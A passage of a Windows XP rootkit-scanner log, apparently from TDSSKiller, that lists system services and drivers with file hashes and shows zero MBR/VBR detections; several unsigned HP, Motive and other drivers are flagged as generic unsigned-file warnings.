08:08:20.0343 0224 Secdrv - ok
08:08:20.0343 0224 seclogon - ok
08:08:20.0359 0224 SENS - ok
08:08:20.0359 0224 Serial - ok
08:08:20.0390 0224 Sfloppy - ok
08:08:20.0390 0224 SharedAccess - ok
08:08:20.0406 0224 ShellHWDetection - ok
08:08:20.0421 0224 Simbad - ok
08:08:20.0421 0224 SiS315 - ok
08:08:20.0437 0224 SISAGP - ok
08:08:20.0437 0224 SiSkp - ok
08:08:20.0453 0224 Sparrow - ok
08:08:20.0468 0224 splitter - ok
08:08:20.0468 0224 Spooler - ok
08:08:20.0484 0224 sr - ok
08:08:20.0484 0224 srservice - ok
08:08:20.0500 0224 Srv - ok
08:08:20.0515 0224 SSDPSRV - ok
08:08:20.0515 0224 StillCam - ok
08:08:20.0531 0224 stisvc - ok
08:08:20.0531 0224 swenum - ok
08:08:20.0546 0224 swmidi - ok
08:08:20.0562 0224 SwPrv - ok
08:08:20.0578 0224 symc810 - ok
08:08:20.0578 0224 symc8xx - ok
08:08:20.0593 0224 sym_hi - ok
08:08:20.0593 0224 sym_u3 - ok
08:08:20.0609 0224 sysaudio - ok
08:08:20.0625 0224 SysmonLog - ok
08:08:20.0625 0224 TapiSrv - ok
08:08:20.0640 0224 Tcpip - ok
08:08:20.0640 0224 TDPIPE - ok
08:08:20.0656 0224 TDTCP - ok
08:08:20.0656 0224 TermDD - ok
08:08:20.0671 0224 TermService - ok
08:08:20.0687 0224 Themes - ok
08:08:20.0687 0224 TosIde - ok
08:08:20.0703 0224 TrkWks - ok
08:08:20.0718 0224 Udfs - ok
08:08:20.0718 0224 ultra - ok
08:08:20.0734 0224 Update - ok
08:08:20.0750 0224 upnphost - ok
08:08:20.0750 0224 UPS - ok
08:08:20.0765 0224 usbaudio - ok
08:08:20.0781 0224 usbccgp - ok
08:08:20.0781 0224 usbehci - ok
08:08:20.0796 0224 usbhub - ok
08:08:20.0796 0224 usbohci - ok
08:08:20.0812 0224 usbprint - ok
08:08:20.0812 0224 usbscan - ok
08:08:20.0828 0224 USBSTOR - ok
08:08:20.0843 0224 usbuhci - ok
08:08:20.0843 0224 VgaSave - ok
08:08:20.0859 0224 viaagp1 - ok
08:08:20.0859 0224 viagfx - ok
08:08:20.0875 0224 ViaIde - ok
08:08:20.0890 0224 VolSnap - ok
08:08:20.0890 0224 VSS - ok
08:08:20.0906 0224 W32Time - ok
08:08:20.0921 0224 Wanarp - ok
08:08:20.0921 0224 WDICA - ok
08:08:20.0937 0224 wdmaud - ok
08:08:20.0937 0224 WebClient - ok
08:08:20.0953 0224 WinDefend - ok
08:08:20.0968 0224 winmgmt - ok
08:08:20.0984 0224 WmdmPmSN - ok
08:08:21.0000 0224 WmiApSrv - ok
08:08:21.0015 0224 WMPNetworkSvc - ok
08:08:21.0015 0224 WpdUsb - ok
08:08:21.0031 0224 WS2IFSL - ok
08:08:21.0046 0224 wscsvc - ok
08:08:21.0046 0224 wuauserv - ok
08:08:21.0062 0224 WudfPf - ok
08:08:21.0062 0224 WudfRd - ok
08:08:21.0078 0224 WudfSvc - ok
08:08:21.0093 0224 WZCSVC - ok
08:08:21.0093 0224 xmlprov - ok
08:08:21.0109 0224 ================ Scan global ===============================
08:08:21.0109 0224 [Global] - ok
08:08:21.0125 0224 ================ Scan MBR ==================================
08:08:21.0140 0224 [ BAD0263FBE81B49F5F07B32DC9D198B3 ] \Device\Harddisk0\DR0
08:08:21.0312 0224 \Device\Harddisk0\DR0 - ok
08:08:21.0312 0224 ================ Scan VBR ==================================
08:08:21.0312 0224 [ 29EED5D12AE78A897E7DAAD5F2670E2C ] \Device\Harddisk0\DR0\Partition1
08:08:21.0328 0224 \Device\Harddisk0\DR0\Partition1 - ok
08:08:21.0328 0224 [ 98DE57513725D00BD7B7284BCAEF83E8 ] \Device\Harddisk0\DR0\Partition2
08:08:21.0328 0224 \Device\Harddisk0\DR0\Partition2 - ok
08:08:21.0328 0224 ============================================================
08:08:21.0328 0224 Scan finished
08:08:21.0328 0224 ============================================================
08:08:21.0343 1356 Detected object count: 0
08:08:21.0343 1356 Actual detected object count: 0
08:08:37.0078 2240 ============================================================
08:08:37.0078 2240 Scan started
08:08:37.0078 2240 Mode: Manual; SigCheck; TDLFS;
08:08:37.0078 2240 ============================================================
08:08:37.0187 2240 ================ Scan system memory ========================
08:08:37.0187 2240 System memory - ok
08:08:37.0187 2240 ================ Scan services =============================
08:08:37.0343 2240 [ 149A8F7ADF9742554DC323E290551E3E ] Aavmker4 C:\WINDOWS\system32\drivers\Aavmker4.sys
08:08:37.0875 2240 Aavmker4 - ok
08:08:37.0890 2240 Abiosdsk - ok
08:08:37.0890 2240 abp480n5 - ok
08:08:37.0953 2240 [ 8FD99680A539792A30E97944FDAECF17 ] ACPI C:\WINDOWS\system32\DRIVERS\ACPI.sys
08:08:40.0656 2240 ACPI - ok
08:08:40.0687 2240 [ 9859C0F6936E723E4892D7141B1327D5 ] ACPIEC C:\WINDOWS\system32\drivers\ACPIEC.sys
08:08:40.0890 2240 ACPIEC - ok
08:08:40.0890 2240 adpu160m - ok
08:08:40.0921 2240 [ 8BED39E3C35D6A489438B8141717A557 ] aec C:\WINDOWS\system32\drivers\aec.sys
08:08:41.0062 2240 aec - ok
08:08:41.0140 2240 [ 1E44BC1E83D8FD2305F8D452DB109CF9 ] AFD C:\WINDOWS\System32\drivers\afd.sys
08:08:41.0187 2240 AFD - ok
08:08:41.0203 2240 [ C685CC27A2E637F0DCB5A45E67CC6F74 ] AFS2K C:\WINDOWS\system32\drivers\AFS2K.sys
08:08:41.0218 2240 AFS2K - ok
08:08:41.0281 2240 [ 593AEFC67283D409F34CC1245D00A509 ] AgereSoftModem C:\WINDOWS\system32\DRIVERS\AGRSM.sys
08:08:41.0437 2240 AgereSoftModem - ok
08:08:41.0437 2240 Aha154x - ok
08:08:41.0453 2240 aic78u2 - ok
08:08:41.0468 2240 aic78xx - ok
08:08:41.0500 2240 [ A9A3DAA780CA6C9671A19D52456705B4 ] Alerter C:\WINDOWS\system32\alrsvc.dll
08:08:41.0687 2240 Alerter - ok
08:08:41.0703 2240 [ 8C515081584A38AA007909CD02020B3D ] ALG C:\WINDOWS\System32\alg.exe
08:08:41.0781 2240 ALG - ok
08:08:41.0781 2240 AliIde - ok
08:08:41.0828 2240 [ 8FCE268CDBDD83B23419D1F35F42C7B1 ] AmdK7 C:\WINDOWS\system32\DRIVERS\amdk7.sys
08:08:41.0984 2240 AmdK7 - ok
08:08:41.0984 2240 amsint - ok
08:08:42.0000 2240 AppMgmt - ok
08:08:42.0031 2240 [ B5B8A80875C1DEDEDA8B02765642C32F ] Arp1394 C:\WINDOWS\system32\DRIVERS\arp1394.sys
08:08:42.0203 2240 Arp1394 - ok
08:08:42.0218 2240 asc - ok
08:08:42.0218 2240 asc3350p - ok
08:08:42.0234 2240 asc3550 - ok
08:08:42.0609 2240 [ 0E5E4957549056E2BF2C49F4F6B601AD ] aspnet_state C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
08:08:42.0765 2240 aspnet_state - ok
08:08:42.0812 2240 [ DE6ED95AEF259979B2830450072A627B ] aswFsBlk C:\WINDOWS\system32\drivers\aswFsBlk.sys
08:08:42.0859 2240 aswFsBlk - ok
08:08:42.0906 2240 [ 84F0BE324EE111338589F448C3E8BAB2 ] aswMon2 C:\WINDOWS\system32\drivers\aswMon2.sys
08:08:42.0921 2240 aswMon2 - ok
08:08:42.0968 2240 [ 7C9F0A2AB17D52261A9252A2EB320884 ] AswRdr C:\WINDOWS\system32\drivers\AswRdr.sys
08:08:42.0984 2240 AswRdr - ok
08:08:43.0062 2240 [ B32E9AD44A1DBB3E8095E80F8DF32B03 ] aswSnx C:\WINDOWS\system32\drivers\aswSnx.sys
08:08:43.0109 2240 aswSnx - ok
08:08:43.0171 2240 [ 67B558895695545FB0568B7541F3BCA7 ] aswSP C:\WINDOWS\system32\drivers\aswSP.sys
08:08:43.0203 2240 aswSP - ok
08:08:43.0218 2240 [ E3E73B2B73A4DFADFDDF557192C4B08A ] aswTdi C:\WINDOWS\system32\drivers\aswTdi.sys
08:08:43.0234 2240 aswTdi - ok
08:08:43.0265 2240 [ B153AFFAC761E7F5FCFA822B9C4E97BC ] AsyncMac C:\WINDOWS\system32\DRIVERS\asyncmac.sys
08:08:43.0421 2240 AsyncMac - ok
08:08:43.0468 2240 [ 9F3A2F5AA6875C72BF062C712CFA2674 ] atapi C:\WINDOWS\system32\DRIVERS\atapi.sys
08:08:43.0625 2240 atapi - ok
08:08:43.0640 2240 Atdisk - ok
08:08:43.0671 2240 [ 9916C1225104BA14794209CFA8012159 ] Atmarpc C:\WINDOWS\system32\DRIVERS\atmarpc.sys
08:08:43.0828 2240 Atmarpc - ok
08:08:43.0875 2240 [ DEF7A7882BEC100FE0B2CE2549188F9D ] AudioSrv C:\WINDOWS\System32\audiosrv.dll
08:08:44.0015 2240 AudioSrv - ok
08:08:44.0062 2240 [ D9F724AA26C010A217C97606B160ED68 ] audstub C:\WINDOWS\system32\DRIVERS\audstub.sys
08:08:44.0218 2240 audstub - ok
08:08:44.0312 2240 [ 8FA553E9AE69808D99C164733A0F9590 ] avast! Antivirus C:\Program Files\AVAST Software\Avast\AvastSvc.exe
08:08:44.0328 2240 avast! Antivirus - ok
08:08:44.0390 2240 [ DA1F27D85E0D1525F6621372E7B685E9 ] Beep C:\WINDOWS\system32\drivers\Beep.sys
08:08:44.0562 2240 Beep - ok
08:08:44.0609 2240 [ 574738F61FCA2935F5265DC4E5691314 ] BITS C:\WINDOWS\system32\qmgr.dll
08:08:44.0875 2240 BITS - ok
08:08:45.0031 2240 [ 3F56903E124E820AEECE6D471583C6C1 ] Bonjour Service C:\Program Files\Bonjour\mDNSResponder.exe
08:08:45.0109 2240 Bonjour Service - ok
08:08:45.0171 2240 [ CFD4E51402DA9838B5A04AE680AF54A0 ] Browser C:\WINDOWS\System32\browser.dll
08:08:45.0328 2240 Browser - ok
08:08:45.0406 2240 [ 248DFA5762DDE38DFDDBBD44149E9D7A ] BVRPMPR5 C:\WINDOWS\system32\drivers\BVRPMPR5.SYS
08:08:45.0468 2240 BVRPMPR5 ( UnsignedFile.Multi.Generic ) - warning
08:08:45.0468 2240 BVRPMPR5 - detected UnsignedFile.Multi.Generic (1)
08:08:45.0593 2240 catchme - ok
08:08:45.0625 2240 [ 90A673FC8E12A79AFBED2576F6A7AAF9 ] cbidf2k C:\WINDOWS\system32\drivers\cbidf2k.sys
08:08:45.0843 2240 cbidf2k - ok
08:08:45.0843 2240 cd20xrnt - ok
08:08:45.0875 2240 [ C1B486A7658353D33A10CC15211A873B ] Cdaudio C:\WINDOWS\system32\drivers\Cdaudio.sys
08:08:46.0046 2240 Cdaudio - ok
08:08:46.0093 2240 [ C885B02847F5D2FD45A24E219ED93B32 ] Cdfs C:\WINDOWS\system32\drivers\Cdfs.sys
08:08:46.0265 2240 Cdfs - ok
08:08:46.0296 2240 [ 1F4260CC5B42272D71F79E570A27A4FE ] Cdrom C:\WINDOWS\system32\DRIVERS\cdrom.sys
08:08:46.0468 2240 Cdrom - ok
08:08:46.0484 2240 Changer - ok
08:08:46.0515 2240 [ 1CFE720EB8D93A7158A4EBC3AB178BDE ] CiSvc C:\WINDOWS\system32\cisvc.exe
08:08:46.0687 2240 CiSvc - ok
08:08:46.0718 2240 [ 34CBE729F38138217F9C80212A2A0C82 ] ClipSrv C:\WINDOWS\system32\clipsrv.exe
08:08:46.0875 2240 ClipSrv - ok
08:08:46.0937 2240 [ D87ACAED61E417BBA546CED5E7E36D9C ] clr_optimization_v2.0.50727_32 C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
08:08:47.0031 2240 clr_optimization_v2.0.50727_32 - ok
08:08:47.0046 2240 CmdIde - ok
08:08:47.0046 2240 COMSysApp - ok
08:08:47.0078 2240 Cpqarray - ok
08:08:47.0125 2240 [ 3D4E199942E29207970E04315D02AD3B ] CryptSvc C:\WINDOWS\System32\cryptsvc.dll
08:08:47.0296 2240 CryptSvc - ok
08:08:47.0296 2240 dac2w2k - ok
08:08:47.0312 2240 dac960nt - ok
08:08:47.0359 2240 [ 6B27A5C03DFB94B4245739065431322C ] DcomLaunch C:\WINDOWS\system32\rpcss.dll
08:08:47.0484 2240 DcomLaunch - ok
08:08:47.0578 2240 [ 5E38D7684A49CACFB752B046357E0589 ] Dhcp C:\WINDOWS\System32\dhcpcsvc.dll
08:08:47.0765 2240 Dhcp - ok
08:08:47.0796 2240 [ 044452051F3E02E7963599FC8F4F3E25 ] Disk C:\WINDOWS\system32\DRIVERS\disk.sys
08:08:47.0968 2240 Disk - ok
08:08:47.0984 2240 dmadmin - ok
08:08:48.0031 2240 [ D992FE1274BDE0F84AD826ACAE022A41 ] dmboot C:\WINDOWS\system32\drivers\dmboot.sys
08:08:48.0234 2240 dmboot - ok
08:08:48.0250 2240 [ 7C824CF7BBDE77D95C08005717A95F6F ] dmio C:\WINDOWS\system32\drivers\dmio.sys
08:08:48.0406 2240 dmio - ok
08:08:48.0453 2240 [ E9317282A63CA4D188C0DF5E09C6AC5F ] dmload C:\WINDOWS\system32\drivers\dmload.sys
08:08:48.0593 2240 dmload - ok
08:08:48.0625 2240 [ 57EDEC2E5F59F0335E92F35184BC8631 ] dmserver C:\WINDOWS\System32\dmserver.dll
08:08:48.0796 2240 dmserver - ok
08:08:48.0843 2240 [ 8A208DFCF89792A484E76C40E5F50B45 ] DMusic C:\WINDOWS\system32\drivers\DMusic.sys
08:08:49.0000 2240 DMusic - ok
08:08:49.0031 2240 [ 5F7E24FA9EAB896051FFB87F840730D2 ] Dnscache C:\WINDOWS\System32\dnsrslvr.dll
08:08:49.0093 2240 Dnscache - ok
08:08:49.0125 2240 [ 0F0F6E687E5E15579EF4DA8DD6945814 ] Dot3svc C:\WINDOWS\System32\dot3svc.dll
08:08:49.0296 2240 Dot3svc - ok
08:08:49.0296 2240 dpti2o - ok
08:08:49.0328 2240 [ 8F5FCFF8E8848AFAC920905FBD9D33C8 ] drmkaud C:\WINDOWS\system32\drivers\drmkaud.sys
08:08:49.0484 2240 drmkaud - ok
08:08:49.0500 2240 [ 2187855A7703ADEF0CEF9EE4285182CC ] EapHost C:\WINDOWS\System32\eapsvc.dll
08:08:49.0671 2240 EapHost - ok
08:08:49.0718 2240 [ BC93B4A066477954555966D77FEC9ECB ] ERSvc C:\WINDOWS\System32\ersvc.dll
08:08:49.0875 2240 ERSvc - ok
08:08:49.0921 2240 [ 38008FAAA9632C2EF8E98BF1614D0527 ] eusk2par C:\WINDOWS\system32\Drivers\eusk2par.sys
08:08:49.0953 2240 eusk2par - ok
08:08:49.0984 2240 [ 65DF52F5B8B6E9BBD183505225C37315 ] Eventlog C:\WINDOWS\system32\services.exe
08:08:50.0031 2240 Eventlog - ok
08:08:50.0078 2240 [ D4991D98F2DB73C60D042F1AEF79EFAE ] EventSystem C:\WINDOWS\System32\es.dll
08:08:50.0156 2240 EventSystem - ok
08:08:50.0203 2240 [ 38D332A6D56AF32635675F132548343E ] Fastfat C:\WINDOWS\system32\drivers\Fastfat.sys
08:08:50.0359 2240 Fastfat - ok
08:08:50.0375 2240 [ 1E580770BDECE924494B368AC980749E ] fasttx2k C:\WINDOWS\system32\DRIVERS\fasttx2k.sys
08:08:50.0421 2240 fasttx2k - ok
08:08:50.0468 2240 [ 99BC0B50F511924348BE19C7C7313BBF ] FastUserSwitchingCompatibility C:\WINDOWS\System32\shsvcs.dll
08:08:50.0546 2240 FastUserSwitchingCompatibility - ok
08:08:50.0578 2240 [ E97D6A8684466DF94FF3BC24FB787A07 ] Fax C:\WINDOWS\system32\fxssvc.exe
08:08:50.0750 2240 Fax - ok
08:08:50.0781 2240 [ 92CDD60B6730B9F50F6A1A0C1F8CDC81 ] Fdc C:\WINDOWS\system32\DRIVERS\fdc.sys
08:08:50.0953 2240 Fdc - ok
08:08:50.0968 2240 [ D45926117EB9FA946A6AF572FBE1CAA3 ] Fips C:\WINDOWS\system32\drivers\Fips.sys
08:08:51.0109 2240 Fips - ok
08:08:51.0140 2240 [ 9D27E7B80BFCDF1CDD9B555862D5E7F0 ] Flpydisk C:\WINDOWS\system32\DRIVERS\flpydisk.sys
08:08:51.0281 2240 Flpydisk - ok
08:08:51.0328 2240 [ B2CF4B0786F8212CB92ED2B50C6DB6B0 ] FltMgr C:\WINDOWS\system32\drivers\fltmgr.sys
08:08:51.0484 2240 FltMgr - ok
08:08:51.0562 2240 [ 8BA7C024070F2B7FDD98ED8A4BA41789 ] FontCache3.0.0.0 c:\WINDOWS\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe
08:08:51.0578 2240 FontCache3.0.0.0 - ok
08:08:51.0625 2240 [ 3E1E2BD4F39B0E2B7DC4F4D2BCC2779A ] Fs_Rec C:\WINDOWS\system32\drivers\Fs_Rec.sys
08:08:51.0781 2240 Fs_Rec - ok
08:08:51.0828 2240 [ 6AC26732762483366C3969C9E4D2259D ] Ftdisk C:\WINDOWS\system32\DRIVERS\ftdisk.sys
08:08:51.0984 2240 Ftdisk - ok
08:08:52.0062 2240 [ AB8A6A87D9D7255C3884D5B9541A6E80 ] GEARAspiWDM C:\WINDOWS\system32\Drivers\GEARAspiWDM.sys
08:08:52.0093 2240 GEARAspiWDM - ok
08:08:52.0187 2240 [ 0A02C63C8B144BD8C86B103DEE7C86A2 ] Gpc C:\WINDOWS\system32\DRIVERS\msgpc.sys
08:08:52.0359 2240 Gpc - ok
08:08:52.0468 2240 [ 506708142BC63DABA64F2D3AD1DCD5BF ] gupdate C:\Program Files\Google\Update\GoogleUpdate.exe
08:08:52.0500 2240 gupdate - ok
08:08:52.0515 2240 [ 506708142BC63DABA64F2D3AD1DCD5BF ] gupdatem C:\Program Files\Google\Update\GoogleUpdate.exe
08:08:52.0531 2240 gupdatem - ok
08:08:52.0562 2240 [ 573C7D0A32852B48F3058CFD8026F511 ] HDAudBus C:\WINDOWS\system32\DRIVERS\HDAudBus.sys
08:08:52.0734 2240 HDAudBus - ok
08:08:52.0812 2240 [ 4FCCA060DFE0C51A09DD5C3843888BCD ] helpsvc C:\WINDOWS\PCHealth\HelpCtr\Binaries\pchsvc.dll
08:08:52.0968 2240 helpsvc - ok
08:08:52.0968 2240 HidServ - ok
08:08:53.0015 2240 [ CCF82C5EC8A7326C3066DE870C06DAF1 ] HidUsb C:\WINDOWS\system32\DRIVERS\hidusb.sys
08:08:53.0156 2240 HidUsb - ok
08:08:53.0187 2240 [ 8878BD685E490239777BFE51320B88E9 ] hkmsvc C:\WINDOWS\System32\kmsvc.dll
08:08:53.0359 2240 hkmsvc - ok
08:08:53.0375 2240 hpn - ok
08:08:53.0484 2240 [ CE0FCEC4D4D860F36D972759B11EAF0F ] hpqcxs08 C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll
08:08:53.0531 2240 hpqcxs08 ( UnsignedFile.Multi.Generic ) - warning
08:08:53.0531 2240 hpqcxs08 - detected UnsignedFile.Multi.Generic (1)
08:08:53.0546 2240 [ EE4C7A4CF2316701FFDE90F404520265 ] hpqddsvc C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll
08:08:53.0562 2240 hpqddsvc ( UnsignedFile.Multi.Generic ) - warning
08:08:53.0562 2240 hpqddsvc - detected UnsignedFile.Multi.Generic (1)
08:08:53.0609 2240 [ 5FABA4775D4C61E55EC669D643FFC71F ] HPZid412 C:\WINDOWS\system32\DRIVERS\HPZid412.sys
08:08:53.0718 2240 HPZid412 - ok
08:08:53.0734 2240 [ A3C43980EE1F1BEAC778B44EA65DBDD4 ] HPZipr12 C:\WINDOWS\system32\DRIVERS\HPZipr12.sys
08:08:53.0796 2240 HPZipr12 - ok
08:08:53.0812 2240 [ 2906949BD4E206F2BB0DD1896CE9F66F ] HPZius12 C:\WINDOWS\system32\DRIVERS\HPZius12.sys
08:08:53.0906 2240 HPZius12 - ok
08:08:53.0953 2240 [ F80A415EF82CD06FFAF0D971528EAD38 ] HTTP C:\WINDOWS\system32\Drivers\HTTP.sys
08:08:54.0000 2240 HTTP - ok
08:08:54.0031 2240 [ 6100A808600F44D999CEBDEF8841C7A3 ] HTTPFilter C:\WINDOWS\System32\w3ssl.dll
08:08:54.0203 2240 HTTPFilter - ok
08:08:54.0218 2240 i2omgmt - ok
08:08:54.0218 2240 i2omp - ok
08:08:54.0281 2240 [ 4A0B06AA8943C1E332520F7440C0AA30 ] i8042prt C:\WINDOWS\system32\DRIVERS\i8042prt.sys
08:08:54.0437 2240 i8042prt - ok
08:08:54.0640 2240 [ 0ACEBB31989CBF9A5663FE4A33D28D21 ] ialm C:\WINDOWS\system32\DRIVERS\ialmnt5.sys
08:08:55.0031 2240 ialm - ok
08:08:55.0125 2240 [ C01AC32DC5C03076CFB852CB5DA5229C ] idsvc C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
08:08:55.0203 2240 idsvc - ok
08:08:55.0234 2240 [ 083A052659F5310DD8B6A6CB05EDCF8E ] Imapi C:\WINDOWS\system32\DRIVERS\imapi.sys
08:08:55.0406 2240 Imapi - ok
08:08:55.0453 2240 [ 30DEAF54A9755BB8546168CFE8A6B5E1 ] ImapiService C:\WINDOWS\system32\imapi.exe
08:08:55.0625 2240 ImapiService - ok
08:08:55.0625 2240 ini910u - ok
08:08:55.0734 2240 [ D383CEF6C0EF6DCAC644E2B954F2C202 ] IntcAzAudAddService C:\WINDOWS\system32\drivers\RtkHDAud.sys
08:08:55.0906 2240 IntcAzAudAddService - ok
08:08:55.0921 2240 [ B5466A9250342A7AA0CD1FBA13420678 ] IntelIde C:\WINDOWS\system32\DRIVERS\intelide.sys
08:08:56.0078 2240 IntelIde - ok
08:08:56.0140 2240 [ 8C953733D8F36EB2133F5BB58808B66B ] intelppm C:\WINDOWS\system32\DRIVERS\intelppm.sys
08:08:56.0312 2240 intelppm - ok
08:08:56.0343 2240 [ 3BB22519A194418D5FEC05D800A19AD0 ] ip6fw C:\WINDOWS\system32\drivers\ip6fw.sys
08:08:56.0500 2240 ip6fw - ok
08:08:56.0515 2240 [ 731F22BA402EE4B62748ADAF6363C182 ] IpFilterDriver C:\WINDOWS\system32\DRIVERS\ipfltdrv.sys
08:08:56.0687 2240 IpFilterDriver - ok
08:08:56.0718 2240 [ B87AB476DCF76E72010632B5550955F5 ] IpInIp C:\WINDOWS\system32\DRIVERS\ipinip.sys
08:08:56.0875 2240 IpInIp - ok
08:08:56.0890 2240 [ CC748EA12C6EFFDE940EE98098BF96BB ] IpNat C:\WINDOWS\system32\DRIVERS\ipnat.sys
08:08:57.0046 2240 IpNat - ok
08:08:57.0343 2240 [ 62937A89470AF8FF172F0980CA8AEFC9 ] iPod Service C:\Program Files\iPod\bin\iPodService.exe
08:08:57.0640 2240 iPod Service - ok
08:08:57.0734 2240 [ 23C74D75E36E7158768DD63D92789A91 ] IPSec C:\WINDOWS\system32\DRIVERS\ipsec.sys
08:08:57.0937 2240 IPSec - ok
08:08:57.0968 2240 [ C93C9FF7B04D772627A3646D89F7BF89 ] IRENUM C:\WINDOWS\system32\DRIVERS\irenum.sys
08:08:58.0062 2240 IRENUM - ok
08:08:58.0078 2240 [ 05A299EC56E52649B1CF2FC52D20F2D7 ] isapnp C:\WINDOWS\system32\DRIVERS\isapnp.sys
08:08:58.0250 2240 isapnp - ok
08:08:58.0296 2240 [ F59C3569A2F2C464BB78CB1BDCDCA55E ] Iviaspi C:\WINDOWS\system32\drivers\iviaspi.sys
08:08:58.0296 2240 Iviaspi ( UnsignedFile.Multi.Generic ) - warning
08:08:58.0296 2240 Iviaspi - detected UnsignedFile.Multi.Generic (1)
08:08:58.0406 2240 [ 32192B4EBE8720ED8D49A455C962CB91 ] JavaQuickStarterService C:\Program Files\Java\jre6\bin\jqs.exe
08:08:58.0437 2240 JavaQuickStarterService - ok
08:08:58.0437 2240 [ 463C1EC80CD17420A542B7F36A36F128 ] Kbdclass C:\WINDOWS\system32\DRIVERS\kbdclass.sys
08:08:58.0609 2240 Kbdclass - ok
08:08:58.0656 2240 [ 692BCF44383D056AED41B045A323D378 ] kmixer C:\WINDOWS\system32\drivers\kmixer.sys
08:08:58.0812 2240 kmixer - ok
08:08:58.0859 2240 [ B467646C54CC746128904E1654C750C1 ] KSecDD C:\WINDOWS\system32\drivers\KSecDD.sys
08:08:58.0937 2240 KSecDD - ok
08:08:58.0968 2240 [ 4103DBB6CAA85E40D271C1AD12BBF776 ] L8042pr2 C:\WINDOWS\system32\DRIVERS\L8042pr2.Sys
08:08:59.0015 2240 L8042pr2 - ok
08:08:59.0062 2240 [ 3A7C3CBE5D96B8AE96CE81F0B22FB527 ] lanmanserver C:\WINDOWS\System32\srvsvc.dll
08:08:59.0109 2240 lanmanserver - ok
08:08:59.0140 2240 [ A8888A5327621856C0CEC4E385F69309 ] lanmanworkstation C:\WINDOWS\System32\wkssvc.dll
08:08:59.0218 2240 lanmanworkstation - ok
08:08:59.0234 2240 lbrtfdc - ok
08:08:59.0281 2240 [ A7DB739AE99A796D91580147E919CC59 ] LmHosts C:\WINDOWS\System32\lmhsvc.dll
08:08:59.0437 2240 LmHosts - ok
08:08:59.0468 2240 [ B666F835C18974F392A387C6E863072F ] LMouFlt2 C:\WINDOWS\system32\DRIVERS\LMouFlt2.Sys
08:08:59.0500 2240 LMouFlt2 - ok
08:08:59.0593 2240 [ E6CB119EF2E148EAA1A247343550756E ] McciCMService C:\Program Files\Common Files\Motive\McciCMService.exe
08:08:59.0609 2240 McciCMService ( UnsignedFile.Multi.Generic ) - warning
08:08:59.0609 2240 McciCMService - detected UnsignedFile.Multi.Generic (1)
08:08:59.0640 2240 [ 986B1FF5814366D71E0AC5755C88F2D3 ] Messenger C:\WINDOWS\System32\msgsvc.dll
08:08:59.0828 2240 Messenger - ok
08:08:59.0906 2240 [ 4AE068242760A1FB6E1A44BF4E16AFA6 ] mnmdd C:\WINDOWS\system32\drivers\mnmdd.sys
08:09:00.0093 2240 mnmdd - ok
08:09:00.0203 2240 [ D18F1F0C101D06A1C1ADF26EED16FCDD ] mnmsrvc C:\WINDOWS\System32\mnmsrvc.exe
08:09:00.0390 2240 mnmsrvc - ok
08:09:00.0437 2240 [ DFCBAD3CEC1C5F964962AE10E0BCC8E1 ] Modem C:\WINDOWS\system32\drivers\Modem.sys
08:09:00.0625 2240 Modem - ok
08:09:00.0640 2240 [ 35C9E97194C8CFB8430125F8DBC34D04 ] Mouclass C:\WINDOWS\system32\DRIVERS\mouclass.sys
08:09:00.0796 2240 Mouclass - ok
08:09:00.0843 2240 [ B1C303E17FB9D46E87A98E4BA6769685 ] mouhid C:\WINDOWS\system32\DRIVERS\mouhid.sys
08:09:01.0000 2240 mouhid - ok
08:09:01.0015 2240 [ A80B9A0BAD1B73637DBCBBA7DF72D3FD ] MountMgr C:\WINDOWS\system32\drivers\MountMgr.sys
08:09:01.0187 2240 MountMgr - ok
08:09:01.0250 2240 [ 730A519505621DF46BCBF9CDAC9FB6AD ] MozillaMaintenance C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
08:09:01.0281 2240 MozillaMaintenance - ok
08:09:01.0312 2240 MpKsl08115bda - ok
08:09:01.0312 2240 mraid35x - ok
08:09:01.0343 2240 [ 9BD4DCB5412921864A7AACDEDFBD1923 ] MREMP50 C:\PROGRA~1\COMMON~1\Motive\MREMP50.SYS
08:09:01.0359 2240 MREMP50 ( UnsignedFile.Multi.Generic ) - warning
08:09:01.0359 2240 MREMP50 - detected UnsignedFile.Multi.Generic (1)
08:09:01.0406 2240 [ 2BC9E43F55DE8C30FC817ED56D0EE907 ] MREMPR5 C:\PROGRA~1\COMMON~1\Motive\MREMPR5.SYS
08:09:01.0421 2240 MREMPR5 ( UnsignedFile.Multi.Generic ) - warning
08:09:01.0421 2240 MREMPR5 - detected UnsignedFile.Multi.Generic (1)
08:09:01.0453 2240 [ 594B9D8194E3F4ECBF0325BD10BBEB05 ] MRENDIS5 C:\PROGRA~1\COMMON~1\Motive\MRENDIS5.SYS
08:09:01.0468 2240 MRENDIS5 ( UnsignedFile.Multi.Generic ) - warning
08:09:01.0468 2240 MRENDIS5 - detected UnsignedFile.Multi.Generic (1)
08:09:01.0515 2240 [ 07C02C892E8E1A72D6BF35004F0E9C5E ] MRESP50 C:\PROGRA~1\COMMON~1\Motive\MRESP50.SYS
08:09:01.0515 2240 MRESP50 ( UnsignedFile.Multi.Generic ) - warning
08:09:01.0515 2240 MRESP50 - detected UnsignedFile.Multi.Generic (1)
08:09:01.0531 2240 mrtRate - ok
08:09:01.0562 2240 [ 11D42BB6206F33FBB3BA0288D3EF81BD ] MRxDAV C:\WINDOWS\system32\DRIVERS\mrxdav.sys
08:09:01.0718 2240 MRxDAV - ok
08:09:01.0765 2240 [ 7D304A5EB4344EBEEAB53A2FE3FFB9F0 ] MRxSmb C:\WINDOWS\system32\DRIVERS\mrxsmb.sys
08:09:01.0828 2240 MRxSmb - ok
08:09:01.0859 2240 [ A137F1470499A205ABBB9AAFB3B6F2B1 ] MSDTC C:\WINDOWS\System32\msdtc.exe
08:09:02.0046 2240 MSDTC - ok
08:09:02.0062 2240 [ C941EA2454BA8350021D774DAF0F1027 ] Msfs C:\WINDOWS\system32\drivers\Msfs.sys
08:09:02.0218 2240 Msfs - ok
08:09:02.0218 2240 MSIServer - ok
08:09:02.0234 2240 [ D1575E71568F4D9E14CA56B7B0453BF1 ] MSKSSRV C:\WINDOWS\system32\drivers\MSKSSRV.sys
08:09:02.0406 2240 MSKSSRV - ok
